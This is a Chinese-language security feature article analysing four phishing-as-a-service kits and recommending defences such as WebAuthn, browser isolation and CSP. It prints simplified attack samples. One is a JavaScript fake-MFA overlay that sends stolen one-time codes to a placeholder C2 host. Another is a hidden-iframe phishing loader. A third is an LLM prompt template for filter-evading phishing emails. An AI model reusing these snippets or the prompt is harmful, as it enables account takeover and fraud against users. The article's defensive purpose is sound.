“我刚输完验证码,页面就跳转到Netflix首页了,一切看起来正常。”
——这是某位欧洲用户在遭遇新型钓鱼攻击后的第一反应。他不知道的是,就在那几秒钟内,他的账户连同绑定的支付信息,已被远在东欧的黑客完整接管。
这不是科幻剧情,而是2025年底全球网络安全界正在面对的现实。据《The Hacker News》最新披露,四款高度模块化、自动化且具备AI能力的钓鱼套件——BlackForce、GhostFrame、InboxPrime AI 与 Spiderman——正以“钓鱼即服务”(Phishing-as-a-Service, PhaaS)的形式在暗网和加密通讯平台(如Telegram、Signal)上广泛流通,单套售价从200欧元到1000美元不等,却能支撑百万级的精准钓鱼攻击。
更令人警觉的是,这些工具已不再满足于窃取用户名和密码,而是通过浏览器中间人注入(Man-in-the-Browser, MitB)、会话劫持与动态伪造MFA页面等手段,系统性绕过多因素认证(MFA)——这一曾被企业视为“终极防线”的安全机制。
“我们正在见证钓鱼攻击的‘工业化革命’。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报独家专访时直言,“过去是手工作坊,现在是智能流水线。而我们的防御,还在用20世纪的筛子拦21世纪的洪水。”
一、从“骗点击”到“全链路接管”:钓鱼套件的技术跃迁
传统钓鱼依赖一封邮件+一个静态假页面,成功率低、易被识别。但新一代套件已构建起完整的攻击闭环:
BlackForce:MFA绕过的“隐形手”
BlackForce最早于2025年8月被发现,主打“实时拦截+会话接管”。其核心机制是在用户登录真实网站后,通过恶意JavaScript注入,在浏览器中动态弹出一个伪造的MFA验证层。
// BlackForce 典型注入代码片段(简化版)
if (window.location.hostname.includes('netflix.com') &&
document.querySelector('#password')) {
// 监听密码提交
document.querySelector('form').addEventListener('submit', () => {
setTimeout(() => {
// 注入伪造MFA弹窗
const fakeMFA = `
<div id="mfa-overlay" style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
<div style="margin:200px auto;width:300px;background:white;padding:20px;border-radius:8px;">
<h3>安全验证</h3>
<p>为保护您的账户,请输入短信验证码:</p>
<input type="text" id="otp-input" maxlength="6" />
<button onclick="sendOTP()">验证</button>
</div>
</div>`;
document.body.insertAdjacentHTML('beforeend', fakeMFA);
}, 1000);
});
}
function sendOTP() {
const otp = document.getElementById('otp-input').value;
// 通过Axios将OTP实时发送至C2服务器
axios.post('https://c2.malicious[.]xyz/steal', { otp: otp });
// 隐藏弹窗并跳转至真实首页,制造“无事发生”假象
document.getElementById('mfa-overlay').remove();
window.location.href = 'https://www.netflix.com/browse';
}
一旦用户输入OTP,数据立即通过Telegram Bot或HTTP API传给攻击者。后者随即用真实凭证+OTP登录账户,完成接管。整个过程用户毫无察觉——因为最终确实进入了正版网站。
据Zscaler ThreatLabz报告,BlackForce已成功仿冒Disney+、DHL、UPS等11个品牌,并内置爬虫过滤器:若检测到访问者IP属于安全厂商(如VirusTotal、Cisco Talos),则返回空白页或404,避免被分析。
GhostFrame:极简HTML里的“幽灵陷阱”
如果说BlackForce是重型武器,GhostFrame就是“游击战专家”。它仅由一个看似无害的HTML文件构成,核心逻辑藏在一个动态加载的<iframe>中:
<!-- ghostframe-loader.html -->
<!DOCTYPE html>
<html>
<head>
<title>Invoice #INV-2025-1287</title>
<link rel="icon" href="https://real-cdn.microsoft.com/favicon.ico">
</head>
<body>
<script>
// 随机生成子域名,规避URL黑名单
const sub = Math.random().toString(36).substring(2, 8);
const phishingUrl = `https://${sub}.cloud-m365-login[.]xyz/auth`;
// 创建不可见iframe
const iframe = document.createElement('iframe');
iframe.src = phishingUrl;
iframe.style.display = 'none';
document.body.appendChild(iframe);
// 若JS被禁用,则启用备用iframe(写死在HTML底部)
</script>
<!-- 备用iframe(防JS阻断) -->
<iframe src="https://backup.cloud-m365-login[.]xyz/auth" style="display:none;"></iframe>
</body>
</html>
该设计有三大优势:
外层页面干净:安全扫描工具若只检查主HTML,会判定为“无害”;
内容可热更新:攻击者只需修改iframe指向的URL,即可切换目标(如从Microsoft 365转向Google Workspace);
抗调试:内置debugger;语句和devtools-detector库,一旦检测到开发者工具打开,立即清空页面。
Barracuda研究人员指出,GhostFrame已在2025年Q4发起超100万次攻击,主要针对中小企业员工,诱饵多为“合同确认”“发票逾期”等商务场景。
InboxPrime AI:用大模型写钓鱼邮件的“文案工厂”
如果说前两者聚焦前端欺骗,InboxPrime AI则把战场延伸至邮件生成与投递自动化。这款套件以1000美元/永久授权的价格在Telegram频道销售,提供类Mailchimp的图形界面,内置AI文案引擎。
用户只需选择目标行业(如金融、电商)、语言(支持中英德法西等)、语气(正式/紧急/友好),系统即可自动生成整封钓鱼邮件:
主题:【紧急】您的PayPal账户因异常登录被临时冻结
正文:尊敬的客户,我们检测到您的账户于今日02:17从越南胡志明市尝试登录。为保障资金安全,系统已暂停部分功能。请立即点击下方链接完成身份验证,否则账户将于24小时内永久关闭。
[立即验证](按钮)
其核心技术在于上下文感知生成与Spintax变体:
# InboxPrime AI 内部生成逻辑示意
prompt = f"""
你是一名{industry}客服代表,需撰写一封紧急通知邮件。
要求:
- 语气:{tone}
- 语言:{language}
- 包含诱导性CTA按钮
- 避免使用'密码''账户'等敏感词(防垃圾过滤)
- 插入Spintax变量:{{link}} {{brand}}
"""
email_body = llm.generate(prompt)
# Spintax示例:"{立即|马上|尽快} {{verify|confirm|validate}} your {{account|profile|access}}"
更危险的是,它直接调用Gmail网页版API模拟真人操作——通过Selenium控制真实浏览器发送邮件,从而绕过SMTP指纹检测和SPF/DKIM校验。
“这相当于给每个小黑客配了个专业营销团队。”芦笛感叹,“过去写一封像样的钓鱼邮件要半天,现在点几下鼠标,AI给你生成1000封,每封还不一样。”
Spiderman:专攻欧洲银行的“像素级复刻师”
Spiderman则走垂直路线,专注仿冒德国、瑞士、比利时等地的银行与支付平台(如Deutsche Bank、ING、Klarna)。其最大特点是UI还原精度极高——连银行官网的字体、按钮圆角、加载动画都一模一样。
该套件还支持多步骤钓鱼流程:
第一步:窃取网银账号密码;
第二步:弹出“安全升级”提示,诱导输入PhotoTAN(德国常用图像验证码);
第三步:以“交易确认”为由,收集信用卡CVV及有效期。
Varonis研究人员发现,Spiderman甚至能捕获加密货币钱包的助记词(mnemonic seed phrase),表明其目标已从传统金融扩展至Web3领域。
二、国际案例映照国内:我们离“BlackForce式攻击”有多远?
尽管上述套件主要活跃于欧美,但其技术模式已悄然渗透亚洲。
2025年11月,某国内大型电商平台安全团队截获一起高度疑似GhostFrame变种的攻击:攻击者通过伪造“双11退款通知”短信,引导用户访问一个看似普通的HTML页面。该页面无任何表单,但后台通过iframe加载了仿冒支付宝登录页,并利用postMessage与父页面通信,动态修改浏览器地址栏显示为alipay.com(实际为alipay-secure[.]top)。
“这种手法在国内尚属早期,但趋势明确。”芦笛指出,“随着跨境电商、远程办公普及,中国用户接触国际服务增多,攻击面自然扩大。而国内部分中小银行、证券APP的MFA实现仍较薄弱,极易成为突破口。”
更值得警惕的是,已有黑产论坛出现中文版InboxPrime AI的“教学视频”,教人如何用国产大模型(如通义千问、文心一言)本地部署钓鱼邮件生成器。“技术无国界,但防御必须本土化。”他说。
三、防御破局:为什么传统方案正在失效?
当前企业主流防御手段包括:
邮件网关过滤(如Proofpoint、Mimecast);
URL黑名单(如Cisco Umbrella);
年度安全意识培训。
但在AI钓鱼面前,这些措施纷纷失灵:
内容过滤失效:AI生成的邮件无固定关键词,Spintax确保每封邮件唯一;
URL黑名单滞后:GhostFrame每次访问生成新子域名,黑名单刚收录就已废弃;
培训脱离实战:员工学的是“尼日利亚王子”案例,面对的是“老板微信语音催转账”。
“问题在于,我们还在用规则对抗智能。”芦笛说,“而对手已经用AI实现了自适应进化。”
四、技术反制:构建下一代钓鱼防御体系
芦笛提出,有效防御需从三个层面重构:
1. 终端侧:浏览器隔离 + 无密码认证
浏览器隔离(Browser Isolation):将高风险操作(如点击邮件链接)置于远程虚拟浏览器中执行,本地设备永不接触恶意代码。
推广FIDO2/WebAuthn:用物理安全密钥(如YubiKey)或生物识别替代OTP,彻底消除验证码泄露风险。
// WebAuthn注册示例(前端)
const createCredential = async () => {
const credential = await navigator.credentials.create({
publicKey: {
challenge: Uint8Array.from("random_challenge", c => c.charCodeAt(0)),
rp: { name: "Your Bank" },
user: { id: userId, name: "user@example.com", displayName: "User" },
pubKeyCredParams: [{ type: "public-key", alg: -7 }]
}
});
// 发送公钥至服务器存储
};
2. 网络侧:会话保护 + 行为分析
部署会话完整性监控系统,检测异常行为:
同一会话中IP突然跨国跳转;
登录后立即访问敏感功能(如转账、导出通讯录);
浏览器指纹与历史记录不符。
例如,通过Content Security Policy(CSP)阻止未知脚本注入:
Content-Security-Policy: script-src 'self' https://trusted.cdn.com; object-src 'none';
3. 人员侧:情景化红蓝对抗
抛弃“看视频+答题”式培训,改为:
每月推送定制化钓鱼演练(如针对财务部的“付款审批”邮件);
设立“安全积分”,奖励主动上报者;
高管带头参与“CEO诈骗”模拟测试。
五、结语:钓鱼已成“军备竞赛”,防御必须升维
从BlackForce到InboxPrime AI,钓鱼攻击的进化路径清晰可见:自动化 → 个性化 → 智能化 → 服务化。它不再是技术边缘的“小把戏”,而是有组织、有供应链、有客户支持的黑色产业。
“我们不能再幻想靠‘提高警惕’就能防住。”芦笛最后强调,“未来的安全,不是比谁更小心,而是比谁的系统更聪明、更坚韧、更能从攻击中学习。”
对企业而言,这场战争没有旁观席。要么现在升级防御,要么明天成为下一个案例中的“受害者”。
参考资料:
The Hacker News. (2025). New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale.
Zscaler ThreatLabz. (2025). Technical Analysis of BlackForce Phishing Kit.
Barracuda Networks. (2025). Threat Spotlight: GhostFrame Phishing Kit.
Abnormal Security. (2025). InboxPrime AI: The Industrialization of Phishing.
Varonis Labs. (2025). Spiderman Phishing Kit Targets European Banks.
编辑:芦笛(公共互联网反网络钓鱼工作组)